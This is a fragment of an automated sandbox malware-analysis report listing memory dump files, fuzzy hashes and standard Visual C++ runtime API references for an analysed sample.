          • Instruction ID: 8702dceea8a34a5a76535e019778507b6b9d0e1008fddd20fbdb311c74e3eb2d
          • Opcode Fuzzy Hash: 946a5b4bb00e147c92b16e7c9cc163cd79a488b86947ea21c061b1e70194a95b
          • Instruction Fuzzy Hash: 7D21D5B1D00148EFCB10DBA9AC808DE7BEDEA403247A08775E514E32D1E3385E56CB94
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: AdjustPointer
          • String ID:
          • API String ID: 1740715915-0
          • Opcode ID: d4e7f8dd14cec7ae38711e434d60df92497942b6d862d19a981a76ff80f3236a
          • Instruction ID: 06d67b8e53e139b34b3c552a019441cb145257aed4aefb96faa899aee4590109
          • Opcode Fuzzy Hash: d4e7f8dd14cec7ae38711e434d60df92497942b6d862d19a981a76ff80f3236a
          • Instruction Fuzzy Hash: A151E076A44606AFDB298F10D841BFE77E6EF40321F1C452DE80587292EB31ED80C790
          APIs
          • TlsGetValue.KERNEL32(00000000,?,006FEDD9,00000000,00705E6A,007126B8,00000000,00000314,?,007039E1,007126B8,Microsoft Visual C++ Runtime Library,00012010), ref: 006FED72
          • TlsGetValue.KERNEL32(00000001,?,006FEDD9,00000000,00705E6A,007126B8,00000000,00000314,?,007039E1,007126B8,Microsoft Visual C++ Runtime Library,00012010), ref: 006FED89
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: Value
          • String ID: EncodePointer$KERNEL32.DLL
          • API String ID: 3702945584-3682587211
          • Opcode ID: 6e6e4c09d37f206f62c141208aa91c8c4f0369e08a50150cc0c16a81bed14158
          • Instruction ID: d845c0c055b451ef7e543bfa82aee399e217df501ec2c1c04b4169eba2f6000d
          • Opcode Fuzzy Hash: 6e6e4c09d37f206f62c141208aa91c8c4f0369e08a50150cc0c16a81bed14158
          • Instruction Fuzzy Hash: 11F0447020121AFADB11A739DC509FB3F9E9F003A47144231FA18D6AB2EF26CD4186A4
          APIs
            • Part of subcall function 007070A4: __getptd.LIBCMT ref: 007070AA
            • Part of subcall function 007070A4: __getptd.LIBCMT ref: 007070BA
          • __getptd.LIBCMT ref: 00707876
            • Part of subcall function 006FF027: __amsg_exit.LIBCMT ref: 006FF037
          • __getptd.LIBCMT ref: 00707884
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: __getptd$__amsg_exit
          • String ID: csm
          • API String ID: 1969926928-1018135373
          • Opcode ID: 1993cce291d80a9215594e339eccf3b7a78138a8c6cb7957884baf4465edb638
          • Instruction ID: 3a8397c190b33ddef655882884208c6809ec370e99f2f128c0a94dc4daa3dfcb
          • Opcode Fuzzy Hash: 1993cce291d80a9215594e339eccf3b7a78138a8c6cb7957884baf4465edb638
          • Instruction Fuzzy Hash: 7D012834C04205DECF389F24D888AADB7F5AF10311F14862DE440566D2DF39AD90CF61